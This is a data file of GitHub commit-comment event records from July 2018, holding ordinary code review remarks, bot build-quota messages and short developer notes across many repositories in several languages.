{"id":"7942354274","type":"CommitCommentEvent","actor":{"login":"yfujii01"},"repo":{"name":"keita-ito0221/test"},"payload":{"comment":{"id":29652788,"position":14,"line":63,"path":"EV3/RunGate.cpp","commit_id":"a665b195e6dab65fd4489636203645e0d53f54d5","created_at":"2018-07-10T08:49:19Z","updated_at":"2018-07-10T08:49:19Z","author_association":"NONE","body":"@shijratgah \r\n「インデントがタブ」かつ「コメントを処理の右に書く」はあまり相性が良くないです。\r\n※タブは環境によってスペース2～8で置き換えられて表示されるので\r\n\r\n「インデントをタブ」で行う場合は、処理の上にコメントを書くほうが大体の場合きれいになります。\r\n右に書きたい場合は処理とコメントの間だけでもスペースにすることをおすすめします。\r\n\r\nちなみにgithubのデフォルトはtab=8スペースです"}},"created_at":"2018-07-10T08:49:19Z"}
{"id":"7942356441","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MGARace"},"payload":{"comment":{"id":29652791,"position":null,"line":null,"path":null,"commit_id":"ebb7cff15fa07a9b3c597b68d2058a1e4864e47d","created_at":"2018-07-10T08:49:43Z","updated_at":"2018-07-10T08:49:43Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MGARace/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `2e6d44fc-841e-11e8-982f-9c88a51ff203`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T08:49:43Z"}
{"id":"7942360082","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MGARace"},"payload":{"comment":{"id":29652800,"position":null,"line":null,"path":null,"commit_id":"a7ef775061309921de0e949773dff0cde6bd6fd1","created_at":"2018-07-10T08:50:25Z","updated_at":"2018-07-10T08:50:25Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MGARace/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `481aae58-841e-11e8-90ae-aa648b7dd76f`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T08:50:25Z"}
{"id":"7942367802","type":"CommitCommentEvent","actor":{"login":"poggit-bot"},"repo":{"name":"MiniGameAPI-PM/MGARace"},"payload":{"comment":{"id":29652810,"position":null,"line":null,"path":null,"commit_id":"7f49539239af0a0878c7ff79e2d2b90896ef0f81","created_at":"2018-07-10T08:51:50Z","updated_at":"2018-07-10T08:51:50Z","author_association":"CONTRIBUTOR","body":"Dear Poggit user,\n\nThis is an automatic message from Poggit-CI. Poggit-CI was triggered by this commit, but failed to create builds due to the following error:\n\n```\nResend this delivery later. This commit is triggered by user djdisodo, who\nhas created 60 Poggit-CI builds in the past 168 hours.\n\nContact @SOF3 [on Discord](https://discord.gg/NgHf9jt) to request for extra\nquota. We will increase your quota for free if you are really contributing\nto open-source plugins actively without abusing Git commits.\n```\n\nAs a result, no builds could be created from this commit. More details might be available for repo admins at [the webhook delivery response log](https://github.com/MiniGameAPI-PM/MGARace/settings/hooks) &mdash; see the webhook starting with `https://poggit.pmmp.io/webhooks.gh.repo` and look for the delivery with ID `7ada8f16-841e-11e8-9fa7-ca20029666f6`.\n\nShall you need any assistance, you may contact us on [on Discord](https://discord.gg/NgHf9jt), or more publicly, [on GitHub](https://github.com/poggit/support/issues). Commenting on this commit directly will **not** notify any Poggit staff.\n\nRegards,\nPoggit Bot (@poggit-bot)\nThe official Poggit automation account"}},"created_at":"2018-07-10T08:51:50Z"}
{"id":"7942369458","type":"CommitCommentEvent","actor":{"login":"oskarrough"},"repo":{"name":"internet4000/trivia-radio4000"},"payload":{"comment":{"id":29652814,"position":null,"line":null,"path":null,"commit_id":"8832d857cff1c26fc92b5c8d7ab0fb5e1eeab2b2","created_at":"2018-07-10T08:52:08Z","updated_at":"2018-07-10T08:52:08Z","author_association":"MEMBER","body":"👍 "}},"created_at":"2018-07-10T08:52:08Z"}
{"id":"7942377411","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/NLily22"},"payload":{"comment":{"id":29652832,"position":10,"line":10,"path":"week-08/day2/TodoMysql/src/main/java/com/greenfoxacademy/todo/connectionwithmysql/models/Todo.java","commit_id":"29a4c432709d34e34a69558e00b3cec53e04919f","created_at":"2018-07-10T08:53:36Z","updated_at":"2018-07-10T08:53:36Z","author_association":"NONE","body":"Simple, clear model with every necessary methods 👍 , but unfortunately our style-guide says: uppercase name allowed at `final` variables and this isn't a  final one."}},"created_at":"2018-07-10T08:53:36Z"}
{"id":"7942380030","type":"CommitCommentEvent","actor":{"login":"howoo101"},"repo":{"name":"howoo101/makeboard"},"payload":{"comment":{"id":29652837,"position":null,"line":null,"path":null,"commit_id":"e67b93a41a40b3b5ce291a3a2dbee4dec17287b9","created_at":"2018-07-10T08:54:06Z","updated_at":"2018-07-10T08:54:06Z","author_association":"OWNER","body":"로직과 화면 디자인이 통합되어 유지보수가 어렵다 "}},"created_at":"2018-07-10T08:54:06Z"}
{"id":"7942381237","type":"CommitCommentEvent","actor":{"login":"oskarrough"},"repo":{"name":"internet4000/trivia-radio4000"},"payload":{"comment":{"id":29652838,"position":4,"line":8,"path":"app/routes/quiz/questions.js","commit_id":"bdadf91c85ad3c45eaa45ca0de119d7eb29fa311","created_at":"2018-07-10T08:54:18Z","updated_at":"2018-07-10T08:54:18Z","author_association":"MEMBER","body":"I added this line so it doesn't break without a channel when you refresh?"}},"created_at":"2018-07-10T08:54:18Z"}
{"id":"7942382218","type":"CommitCommentEvent","actor":{"login":"akzqz111"},"repo":{"name":"xavysp/multispectral_demosaicing"},"payload":{"comment":{"id":29652849,"position":null,"line":null,"path":null,"commit_id":"7ecc13b8b289d54abea293086f370839a61f3e7a","created_at":"2018-07-10T08:54:29Z","updated_at":"2018-07-10T08:54:29Z","author_association":"NONE","body":"can you upload the interpolation for G channels? thanks."}},"created_at":"2018-07-10T08:54:29Z"}
{"id":"7942385600","type":"CommitCommentEvent","actor":{"login":"niklasl"},"repo":{"name":"libris/definitions"},"payload":{"comment":{"id":29652856,"position":null,"line":null,"path":null,"commit_id":"e26b474678c71eeeb6f46147d83b1ed6e1d8dae5","created_at":"2018-07-10T08:55:07Z","updated_at":"2018-07-10T08:55:07Z","author_association":"MEMBER","body":"kbv:Nebulous owl:sameAs <https://schema.org/Intangible> ? :+1: :laughing: "}},"created_at":"2018-07-10T08:55:07Z"}
{"id":"7942387739","type":"CommitCommentEvent","actor":{"login":"HerrNorbert"},"repo":{"name":"green-fox-academy/NLily22"},"payload":{"comment":{"id":29652860,"position":12,"line":12,"path":"week-08/day2/TodoMysql/src/main/java/com/greenfoxacademy/todo/connectionwithmysql/models/Todo.java","commit_id":"29a4c432709d34e34a69558e00b3cec53e04919f","created_at":"2018-07-10T08:55:30Z","updated_at":"2018-07-10T08:55:30Z","author_association":"NONE","body":"In my opinion it would be better if you name this field like `isUrgent` to sign that, this is a boolean variable. Also at `isDone`."}},"created_at":"2018-07-10T08:55:30Z"}
{"id":"7942392035","type":"CommitCommentEvent","actor":{"login":"carlomigoni"},"repo":{"name":"discos/doc"},"payload":{"comment":{"id":29652871,"position":null,"line":null,"path":null,"commit_id":"d0df3e33bba10a39ce886a977459e917e435eca8","created_at":"2018-07-10T08:56:14Z","updated_at":"2018-07-10T08:56:14Z","author_association":"NONE","body":"SARDARA\r\nThe old Roach component is renamed as Sardara in every instance of DISCOS.\r\nThe Sardara possibile configurations are:\r\nSK00, SK03, SK06, SK77, SC00, SL00, SP00 (no Stokes)\r\nSK00S, SK03S, SK06S, SK77S, SC00S, SL00S, SP00S (full Stokes)\r\n\r\nACTIVE SURFACE\r\nAfter an asPark command the actuatoros are commanded to zero mechanical position and a \"PARK\" profile appears in the SRT Active Surface GUI\r\n\r\nRFI Monitoring\r\nA custom version of External Clients component has been realized for the rfi monitoring task;\r\nin the ACS Command Center is available a new RFIMonitoringContainer\r\n"}},"created_at":"2018-07-10T08:56:14Z"}
{"id":"7942395698","type":"CommitCommentEvent","actor":{"login":"SDey96"},"repo":{"name":"SDey96/Kolkata-Neighborhood-Map"},"payload":{"comment":{"id":29652874,"position":32,"line":25,"path":"js/app.js","commit_id":"e3ded5c94c3b2dc99d2136c87cb913e03a3c9760","created_at":"2018-07-10T08:56:50Z","updated_at":"2018-07-10T08:56:50Z","author_association":"OWNER","body":"This is a new promise added in a recent version of jQuery."}},"created_at":"2018-07-10T08:56:50Z"}
{"id":"7942397258","type":"CommitCommentEvent","actor":{"login":"SDey96"},"repo":{"name":"SDey96/Kolkata-Neighborhood-Map"},"payload":{"comment":{"id":29652882,"position":null,"line":null,"path":null,"commit_id":"e3ded5c94c3b2dc99d2136c87cb913e03a3c9760","created_at":"2018-07-10T08:57:09Z","updated_at":"2018-07-10T08:57:09Z","author_association":"OWNER","body":"Appropriate comments have been added."}},"created_at":"2018-07-10T08:57:09Z"}
{"id":"7942400010","type":"CommitCommentEvent","actor":{"login":"lag-linaro"},"repo":{"name":"logi85/docker"},"payload":{"comment":{"id":29652895,"position":null,"line":null,"path":null,"commit_id":"e5ee848b0698fc8435f3db074f980e8c33d6958f","created_at":"2018-07-10T08:57:39Z","updated_at":"2018-07-10T08:57:39Z","author_association":"NONE","body":"This change is not required.\r\n\r\nThe current Dockerfile builds perfectly on ARM64 hardware - no source changes need to be made."}},"created_at":"2018-07-10T08:57:39Z"}
{"id":"7942400787","type":"CommitCommentEvent","actor":{"login":"sknopper"},"repo":{"name":"Up2Go/cprm-analytics"},"payload":{"comment":{"id":29652899,"position":51,"line":51,"path":"src/classes/BpiFilteredDashboardCtrl.cls","commit_id":"eef617c3d9a6bfdf6f73a836a2cd1f686f22f8e0","created_at":"2018-07-10T08:57:47Z","updated_at":"2018-07-10T08:57:47Z","author_association":"NONE","body":"Why ''+* instead of *.toString()?"}},"created_at":"2018-07-10T08:57:47Z"}
{"id":"7942404335","type":"CommitCommentEvent","actor":{"login":"deletescape"},"repo":{"name":"amirzaidi/MaterialFX"},"payload":{"comment":{"id":29652911,"position":1,"line":1,"path":"local.properties","commit_id":"20d8d7121535c27dc5261c3c6e0e4cf55240c54c","created_at":"2018-07-10T08:58:25Z","updated_at":"2018-07-10T08:58:25Z","author_association":"NONE","body":"This has probably happened by mistake, you should add it to your gitignore"}},"created_at":"2018-07-10T08:58:25Z"}
{"id":"7942422540","type":"CommitCommentEvent","actor":{"login":"shijratgah"},"repo":{"name":"keita-ito0221/test"},"payload":{"comment":{"id":29653021,"position":14,"line":63,"path":"EV3/RunGate.cpp","commit_id":"a665b195e6dab65fd4489636203645e0d53f54d5","created_at":"2018-07-10T09:01:30Z","updated_at":"2018-07-10T09:01:30Z","author_association":"COLLABORATOR","body":"ご指摘ありがとうございます。\r\n次挙げるときはその点を気をつけてあげたいと思います。"}},"created_at":"2018-07-10T09:01:30Z"}
{"id":"7942425122","type":"CommitCommentEvent","actor":{"login":"christophe-lejeune"},"repo":{"name":"Hypertopic/Cassandre"},"payload":{"comment":{"id":29653067,"position":7,"line":7,"path":"templates/activity.html","commit_id":"25c99b26fc5be065d63e2c1818f8686229f58442","created_at":"2018-07-10T09:01:54Z","updated_at":"2018-07-10T09:01:54Z","author_association":"MEMBER","body":"Even more (about 540), if we consider that this commit includes a fresh favicon (with 121 loc replacing a png file). \r\nThank you for your support and encouragement, Aurélien !"}},"created_at":"2018-07-10T09:01:54Z"}
{"id":"7942427633","type":"CommitCommentEvent","actor":{"login":"GVV34"},"repo":{"name":"GVV34/NERDS_2018"},"payload":{"comment":{"id":29653115,"position":62,"line":164,"path":"catalog.html","commit_id":"f5e75cf84b5ab05bb37785199494421fedf8b981","created_at":"2018-07-10T09:02:21Z","updated_at":"2018-07-10T09:02:21Z","author_association":"OWNER","body":"дк"}},"created_at":"2018-07-10T09:02:21Z"}
{"id":"7942429404","type":"CommitCommentEvent","actor":{"login":"zaufi"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29653119,"position":null,"line":null,"path":null,"commit_id":"917cc160a14ee45801ff227f5678854dc4c0c06e","created_at":"2018-07-10T09:02:39Z","updated_at":"2018-07-10T09:02:39Z","author_association":"CONTRIBUTOR","body":"Python bindings library get broken after this commit :("}},"created_at":"2018-07-10T09:02:39Z"}
{"id":"7942432093","type":"CommitCommentEvent","actor":{"login":"deepshikha2k5"},"repo":{"name":"deepshikha2k5/project-sunbird.github.io"},"payload":{"comment":{"id":29653126,"position":null,"line":null,"path":null,"commit_id":"3167b99f32cdf071a0427debd7f8c86429fe637c","created_at":"2018-07-10T09:03:10Z","updated_at":"2018-07-10T09:03:10Z","author_association":"OWNER","body":"Created a md page to be included in the developer's doc withing onboarding section"}},"created_at":"2018-07-10T09:03:10Z"}
{"id":"7942445345","type":"CommitCommentEvent","actor":{"login":"MageSlayer"},"repo":{"name":"MageSlayer/paludis-gentoo-patches"},"payload":{"comment":{"id":29653147,"position":null,"line":null,"path":null,"commit_id":"917cc160a14ee45801ff227f5678854dc4c0c06e","created_at":"2018-07-10T09:05:34Z","updated_at":"2018-07-10T09:05:34Z","author_association":"OWNER","body":"Could you create an issue and describe how to reproduce and test?"}},"created_at":"2018-07-10T09:05:34Z"}
{"id":"7942448898","type":"CommitCommentEvent","actor":{"login":"zhshaohui"},"repo":{"name":"googlehosts/hosts"},"payload":{"comment":{"id":29653153,"position":6,"line":21,"path":"README.md","commit_id":"27818e18accf4b8c90f5e8119a0b925d22178248","created_at":"2018-07-10T09:06:13Z","updated_at":"2018-07-10T09:06:13Z","author_association":"NONE","body":"收到！非常感谢。\n\n\nOn Tue, Jul 10, 2018 at 12:56 PM lrin <notifications@github.com> wrote:\n\n> @zhshaohui <https://github.com/zhshaohui> 我们没有添加过任何VS2017相关的域名欸XD 其他见楼上\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/googlehosts/hosts/commit/27818e18accf4b8c90f5e8119a0b925d22178248#commitcomment-29650939>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AD8-jZPS8nZ3sAkKhgzUY8hff86AYy7Sks5uFDPvgaJpZM4U73L6>\n> .\n>\n"}},"created_at":"2018-07-10T09:06:13Z"}
{"id":"7942454842","type":"CommitCommentEvent","actor":{"login":"gunnihinn"},"repo":{"name":"go-graphite/helper-scripts"},"payload":{"comment":{"id":29653163,"position":4,"line":3,"path":"LICENSE","commit_id":"daf90c4ade14814018029302072d66f993fba8e7","created_at":"2018-07-10T09:07:21Z","updated_at":"2018-07-10T09:07:21Z","author_association":"NONE","body":"?"}},"created_at":"2018-07-10T09:07:21Z"}
{"id":"7942458994","type":"CommitCommentEvent","actor":{"login":"simakovvv"},"repo":{"name":"simakovvv/laboratory_work_on_java"},"payload":{"comment":{"id":29653175,"position":null,"line":null,"path":null,"commit_id":"aa033c2f00b1134390e369ca88f8faf979d67c68","created_at":"2018-07-10T09:08:07Z","updated_at":"2018-07-10T09:08:07Z","author_association":"OWNER","body":"summation of numbers in an array by diagonals"}},"created_at":"2018-07-10T09:08:07Z"}
{"id":"7942465896","type":"CommitCommentEvent","actor":{"login":"Pouya-moh"},"repo":{"name":"cogimon/rtt-gazebo-robot-sim"},"payload":{"comment":{"id":29653185,"position":null,"line":null,"path":null,"commit_id":"a9877054d8e89c9258e961b48f717d2bbedbcc91","created_at":"2018-07-10T09:09:20Z","updated_at":"2018-07-10T09:09:20Z","author_association":"CONTRIBUTOR","body":"Hi,\r\n\r\nHave you tested this in an isolated environment? If I clone it in a tmp folder and compiling it after setting proper prefix-path, it fails because of [this](https://github.com/cogimon/rtt-gazebo-robot-sim/blame/067bde359156b1fe2c05dac8bc1413a67fb1015e/include/force_torque_sensor.h#L7)\r\n\r\nAnd I think my whole XBotFamily is up-to-date..."}},"created_at":"2018-07-10T09:09:20Z"}
{"id":"7942466492","type":"CommitCommentEvent","actor":{"login":"flashkicker"},"repo":{"name":"RTXteam/RTX"},"payload":{"comment":{"id":29653187,"position":null,"line":null,"path":null,"commit_id":"663b3f3c4cc22d8ecbf9a0cb1b75f805953579dc","created_at":"2018-07-10T09:09:26Z","updated_at":"2018-07-10T09:09:26Z","author_association":"MEMBER","body":"QueryEBIOLSExtended.get_disease_description and QueryEBIOLSExtended.get_phenotype_description now returns the label of the disease and phenotype respectively instead of their description. Tried to return both as a dictionary but ran into a problem. Need to review this code to write a permanent fix after discussing with @DeqingQu."}},"created_at":"2018-07-10T09:09:26Z"}
{"id":"7942469788","type":"CommitCommentEvent","actor":{"login":"sirTribble"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29653191,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-10T09:10:01Z","updated_at":"2018-07-10T09:10:01Z","author_association":"NONE","body":"Also, the filter change on (704, 659, 660) breaks output for player and target auras in debug interface in ovale settings GUI "}},"created_at":"2018-07-10T09:10:01Z"}
{"id":"7942476566","type":"CommitCommentEvent","actor":{"login":"GediminasD"},"repo":{"name":"GediminasD/Wording-2.0"},"payload":{"comment":{"id":29653202,"position":null,"line":null,"path":null,"commit_id":"628ce3528352fb1b59a791094928d0d35e62e6d2","created_at":"2018-07-10T09:11:16Z","updated_at":"2018-07-10T09:11:16Z","author_association":"OWNER","body":"Nereikalinga paskutinė dalis kuri kalba apie taršą gamtai\r\n The specific reporting procedures for seepage and pollution as described in paragraph (21) of the Exclusion clause of Section 8 remain paramount."}},"created_at":"2018-07-10T09:11:16Z"}
{"id":"7942480804","type":"CommitCommentEvent","actor":{"login":"moonwjw"},"repo":{"name":"zjhou/fufu.im"},"payload":{"comment":{"id":29653207,"position":null,"line":null,"path":null,"commit_id":"a51133cf7761068855f247f69079b11154eac908","created_at":"2018-07-10T09:12:02Z","updated_at":"2018-07-10T09:12:02Z","author_association":"NONE","body":"噢豁 "}},"created_at":"2018-07-10T09:12:02Z"}
{"id":"7942488371","type":"CommitCommentEvent","actor":{"login":"divanova-tsd"},"repo":{"name":"relativitydev/Gravity"},"payload":{"comment":{"id":29653221,"position":32,"line":196,"path":"Gravity/Gravity/Base/BaseDto.cs","commit_id":"4d1db44d8b152f528f8a563796c3c8e766852b67","created_at":"2018-07-10T09:13:20Z","updated_at":"2018-07-10T09:13:20Z","author_association":"COLLABORATOR","body":"This code snippet has been updated with suggested approach."}},"created_at":"2018-07-10T09:13:20Z"}
{"id":"7942499946","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653242,"position":17,"line":17,"path":"index.html","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:15:25Z","updated_at":"2018-07-10T09:15:25Z","author_association":"NONE","body":"CTRL + ALT + R"}},"created_at":"2018-07-10T09:15:25Z"}
{"id":"7942500648","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29653243,"position":29,"line":145,"path":"themes/survey/vanilla/scripts/ajaxify.js","commit_id":"d40dae716d5d7a58623a8ad334fd17625b8183a7","created_at":"2018-07-10T09:15:32Z","updated_at":"2018-07-10T09:15:32Z","author_association":"COLLABORATOR","body":"@lacrioque ! please review : https://bugs.limesurvey.org/view.php?id=13860 .\r\n\r\nUsage of `#limesurvey [type=submit]:not([data-confirmedby])` is really the best solution. "}},"created_at":"2018-07-10T09:15:32Z"}
{"id":"7942515515","type":"CommitCommentEvent","actor":{"login":"kKdH"},"repo":{"name":"logbee/keyscore"},"payload":{"comment":{"id":29653275,"position":5,"line":201,"path":"keyscore-frontier/src/main/scala/io/logbee/keyscore/frontier/app/FrontierApplication.scala","commit_id":"f6583c3b571df70317385d3ca7152edf99c323fb","created_at":"2018-07-10T09:18:12Z","updated_at":"2018-07-10T09:18:12Z","author_association":"CONTRIBUTOR","body":"Reuse the configure path with http `get` method. Maybe we should rename `/filter/:id/configure` into `/filter/:id/config`."}},"created_at":"2018-07-10T09:18:12Z"}
{"id":"7942519945","type":"CommitCommentEvent","actor":{"login":"NourAldeen22"},"repo":{"name":"NourAldeen22/nour"},"payload":{"comment":{"id":29653285,"position":2,"line":2,"path":"README.md","commit_id":"e21df54f7922abfca90f1402928c6064ad95707d","created_at":"2018-07-10T09:18:58Z","updated_at":"2018-07-10T09:18:58Z","author_association":"OWNER","body":"nn"}},"created_at":"2018-07-10T09:18:58Z"}
{"id":"7942526315","type":"CommitCommentEvent","actor":{"login":"rebel473"},"repo":{"name":"rebel473/file1"},"payload":{"comment":{"id":29653291,"position":null,"line":null,"path":null,"commit_id":"c0364d279cd778790df8adf034771546a4ccb192","created_at":"2018-07-10T09:20:08Z","updated_at":"2018-07-10T09:20:08Z","author_association":"OWNER","body":"delete"}},"created_at":"2018-07-10T09:20:08Z"}
{"id":"7942530728","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653297,"position":16,"line":16,"path":"index.html","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:20:52Z","updated_at":"2018-07-10T09:20:52Z","author_association":"NONE","body":"CTRL + ALT + L"}},"created_at":"2018-07-10T09:20:52Z"}
{"id":"7942531912","type":"CommitCommentEvent","actor":{"login":"waxz"},"repo":{"name":"waxz/catkin_startup"},"payload":{"comment":{"id":29653301,"position":null,"line":null,"path":null,"commit_id":"475e6974623a5e3a288d71622d2d587b7a711896","created_at":"2018-07-10T09:21:05Z","updated_at":"2018-07-10T09:21:05Z","author_association":"OWNER","body":"- [ ] amcl reset pose\r\n\r\n- [ ] pattern matcher points order"}},"created_at":"2018-07-10T09:21:05Z"}
{"id":"7942533623","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653308,"position":16,"line":16,"path":"index.html","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:21:22Z","updated_at":"2018-07-10T09:21:22Z","author_association":"NONE","body":"Классы нужно называть понятно"}},"created_at":"2018-07-10T09:21:22Z"}
{"id":"7942536638","type":"CommitCommentEvent","actor":{"login":"limengda150"},"repo":{"name":"limengda150/Python"},"payload":{"comment":{"id":29653313,"position":null,"line":null,"path":null,"commit_id":"08b964457cb72205dc39ef989076ce1e33d8bdce","created_at":"2018-07-10T09:21:53Z","updated_at":"2018-07-10T09:21:53Z","author_association":"OWNER","body":"Beginning1"}},"created_at":"2018-07-10T09:21:53Z"}
{"id":"7942537700","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653316,"position":16,"line":16,"path":"index.html","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:22:05Z","updated_at":"2018-07-10T09:22:05Z","author_association":"NONE","body":"<section>\r\n <main> \r\n </main>\r\n<section>"}},"created_at":"2018-07-10T09:22:05Z"}
{"id":"7942540356","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653321,"position":18,"line":18,"path":"index.html","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:22:33Z","updated_at":"2018-07-10T09:22:33Z","author_association":"NONE","body":"sublock"}},"created_at":"2018-07-10T09:22:33Z"}
{"id":"7942541590","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653324,"position":16,"line":16,"path":"index.html","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:22:46Z","updated_at":"2018-07-10T09:22:46Z","author_association":"NONE","body":"logo-section"}},"created_at":"2018-07-10T09:22:46Z"}
{"id":"7942544545","type":"CommitCommentEvent","actor":{"login":"simakovvv"},"repo":{"name":"simakovvv/laboratory_work_on_java"},"payload":{"comment":{"id":29653329,"position":null,"line":null,"path":null,"commit_id":"9fae1db3476e9006463e5e573ea00055dde8d85a","created_at":"2018-07-10T09:23:19Z","updated_at":"2018-07-10T09:23:19Z","author_association":"OWNER","body":"Example of using interfaces"}},"created_at":"2018-07-10T09:23:19Z"}
{"id":"7942573437","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653389,"position":27,"line":27,"path":"index.html","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:28:32Z","updated_at":"2018-07-10T09:28:32Z","author_association":"NONE","body":"`<br />`"}},"created_at":"2018-07-10T09:28:32Z"}
{"id":"7942576350","type":"CommitCommentEvent","actor":{"login":"PriyaPrabakaran"},"repo":{"name":"PriyaPrabakaran/Myappsample"},"payload":{"comment":{"id":29653396,"position":2,"line":2,"path":"app.js","commit_id":"ea829402d8282cbf643fd159a87fb656b94e86ce","created_at":"2018-07-10T09:29:02Z","updated_at":"2018-07-10T09:29:02Z","author_association":"OWNER","body":"var a=12;"}},"created_at":"2018-07-10T09:29:02Z"}
{"id":"7942577587","type":"CommitCommentEvent","actor":{"login":"carsonblack"},"repo":{"name":"carsonblack/therapyrealm-d8"},"payload":{"comment":{"id":29653398,"position":null,"line":null,"path":null,"commit_id":"3bad79782003e1633c534d44448d8e90d8127397","created_at":"2018-07-10T09:29:15Z","updated_at":"2018-07-10T09:29:15Z","author_association":"OWNER","body":"Created multidev environment [therapyrealm-d8#ci-76](https://dashboard.pantheon.io/sites/1e2f72fb-b1d6-4944-b76a-de18b38c3d0c#ci-76).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-76-therapyrealm-d8.pantheonsite.io/)"}},"created_at":"2018-07-10T09:29:15Z"}
{"id":"7942579626","type":"CommitCommentEvent","actor":{"login":"ctf0"},"repo":{"name":"ctf0/laravel-mix-versionhash"},"payload":{"comment":{"id":29653402,"position":null,"line":null,"path":null,"commit_id":"e8282f5f2c0c47ce012c1423880927be44ec0cef","created_at":"2018-07-10T09:29:37Z","updated_at":"2018-07-10T09:29:37Z","author_association":"OWNER","body":"actually i just noticed that i should have added a default to the get delimiter method, so `xxx` would be converted into `.`"}},"created_at":"2018-07-10T09:29:37Z"}
{"id":"7942580902","type":"CommitCommentEvent","actor":{"login":"typicalzergling"},"repo":{"name":"typicalzergling/vendor"},"payload":{"comment":{"id":29653405,"position":23,"line":77,"path":"ui/tooltip.lua","commit_id":"351349af1926ea2ad8b125e8180655624d08b124","created_at":"2018-07-10T09:29:50Z","updated_at":"2018-07-10T09:29:50Z","author_association":"OWNER","body":"Use if IsDebug() for this (Just defined this in Master) to be explicit that this is for Debug only, rather than implictly from ruleId being defined.\r\n\r\n"}},"created_at":"2018-07-10T09:29:50Z"}
{"id":"7942584985","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"Pashqqqaaa/Portfolio"},"payload":{"comment":{"id":29653409,"position":56,"line":56,"path":"index.html","commit_id":"dd6331e075f6b0d19a86517f5481804875bb8fe6","created_at":"2018-07-10T09:30:31Z","updated_at":"2018-07-10T09:30:31Z","author_association":"NONE","body":"zornet-ru\r\nb1-b2"}},"created_at":"2018-07-10T09:30:31Z"}
{"id":"7942585239","type":"CommitCommentEvent","actor":{"login":"Soumil07"},"repo":{"name":"AnIdiotsGuide/discordjs-bot-guide"},"payload":{"comment":{"id":29653411,"position":7,"line":128,"path":"coding-guides/making-your-own-starboard.md","commit_id":"d06bf41e97ccc31a0f13c90236d152e1386d9f63","created_at":"2018-07-10T09:30:34Z","updated_at":"2018-07-10T09:30:34Z","author_association":"NONE","body":"Rename this to messages or something more appropriate, please."}},"created_at":"2018-07-10T09:30:34Z"}
